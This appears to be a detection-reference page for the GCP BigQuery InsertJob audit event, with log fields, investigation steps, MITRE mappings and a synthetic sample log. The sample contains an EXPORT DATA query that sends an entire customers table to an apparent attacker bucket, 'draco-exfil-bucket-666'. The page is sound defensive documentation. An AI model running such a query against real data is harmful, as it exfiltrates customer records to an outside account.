Skip to content

bigquery.jobs.insert

GCP

bigquery.jobs.insert

service: GCP - BigQuery
techniques:

Event

InsertJob submits work; job insertion, job completion, table access, and destination writes are distinct evidence. EXPORT DATA is a query job that can write query results to supported destinations. Job creation authority alone does not grant source data access or destination object-write permissions.

Security Context

Unauthorized queries can collect database data (T1213.006); transfer to another controlled cloud account can support T1537 when destination ownership and completion are established. Normal analytics/export workflows use the same API. A job request does not prove a complete export or preceding token theft.

Log Source

Google Cloud Audit Logs with protoPayload.serviceName: bigquery.googleapis.com and protoPayload.methodName: google.cloud.bigquery.v2.JobService.InsertJob. BigQuery Data Access logs are enabled by default. Inspect JobInsertion and subsequent JobChange/table-access evidence, as well as routing, exclusions, retention, and permission to view logs.

Key Fields

FieldInvestigation value
protoPayload.authenticationInfoEffective principal and delegation information where present.
protoPayload.methodName, resourceNameService method and resource scope.
protoPayload.authorizationInfo, statusReported authorization and outcome; a granted permission is not completion evidence.
protoPayload.request, response, metadata, serviceDataPolicy or job details and deltas, where logged; field presence varies.
operation, timestamp, logNameLong-running correlation, timing, and audit stream.

What to Investigate

  1. Confirm the recorded outcome and compare actor, target, and timing with the approved workflow.
  2. Inspect job type, query/source scope, destination, effective identity/delegation, and approved purpose.
  3. Correlate job ID through final status/errors and source table access; inspect row/column controls and service-perimeter restrictions as applicable.
  4. Confirm destination object creation, owning project/principal, and later reads before calling it exfiltration.

Sample Event

Synthetic scenario. The sample is now a JobInsertion event in PENDING state with an inert EXPORT DATA query. It does not prove completion, bucket ownership, or an earlier GenerateAccessToken event. The delegation field is an illustrative attribution clue.

Exact field presence, payload nesting, identity/session details, and timestamp formatting remain unverified against captured logs. Names and illustrative identifiers do not prove intent or downstream activity.

{
"protoPayload": {
"@type": "type.googleapis.com/google.cloud.audit.AuditLog",
"status": {},
"authenticationInfo": {
"principalEmail": "occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com",
"principalSubject": "serviceAccount:occamy-pipeline@fantasticlogs-prod.iam.gserviceaccount.com",
"serviceAccountDelegationInfo": [
{
"firstPartyPrincipal": {
"principalEmail": "draco@fantasticlogs.cloud"
}
}
]
},
"requestMetadata": {
"callerIp": "203.0.113.66",
"callerSuppliedUserAgent": "synthetic-client/1.0",
"requestAttributes": {
"time": "2026-04-15T17:02:11.123456789Z",
"auth": {}
},
"destinationAttributes": {}
},
"serviceName": "bigquery.googleapis.com",
"methodName": "google.cloud.bigquery.v2.JobService.InsertJob",
"authorizationInfo": [
{
"resource": "projects/fantasticlogs-prod",
"permission": "bigquery.jobs.create",
"granted": true,
"resourceAttributes": {}
}
],
"resourceName": "projects/fantasticlogs-prod/jobs/bquxjob_occamy_001111101000",
"metadata": {
"@type": "type.googleapis.com/google.cloud.audit.BigQueryAuditMetadata",
"jobInsertion": {
"job": {
"jobName": "projects/fantasticlogs-prod/jobs/bquxjob_occamy_001111101000",
"jobConfig": {
"type": "QUERY",
"queryConfig": {
"query": "EXPORT DATA OPTIONS (uri = 'gs://draco-exfil-bucket-666/customers-*.parquet', format = 'PARQUET', overwrite = true) AS SELECT * FROM `fantasticlogs-prod.occamy_events.customers`",
"statementType": "EXPORT_DATA",
"priority": "QUERY_INTERACTIVE"
}
},
"jobStatus": {
"jobState": "PENDING"
},
"jobStats": {
"createTime": "2026-04-15T17:02:11.050000000Z"
}
},
"reason": "JOB_INSERT_REQUEST"
}
}
},
"insertId": "evt001111101000",
"resource": {
"type": "bigquery_project",
"labels": {
"project_id": "fantasticlogs-prod",
"location": "us-central1"
}
},
"timestamp": "2026-04-15T17:02:11.098765432Z",
"severity": "INFO",
"logName": "projects/fantasticlogs-prod/logs/cloudaudit.googleapis.com%2Fdata_access",
"receiveTimestamp": "2026-04-15T17:02:11.456789012Z"
}

Sources

MITRE ATT&CK Mapping

Tactics: Collection Exfiltration

Techniques:
  • T1213.006 — Databases — Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments).
  • T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
Documentation reviewed: October 5, 2026. Samples are synthetic illustrations, not captured production logs or lab-validated fixtures.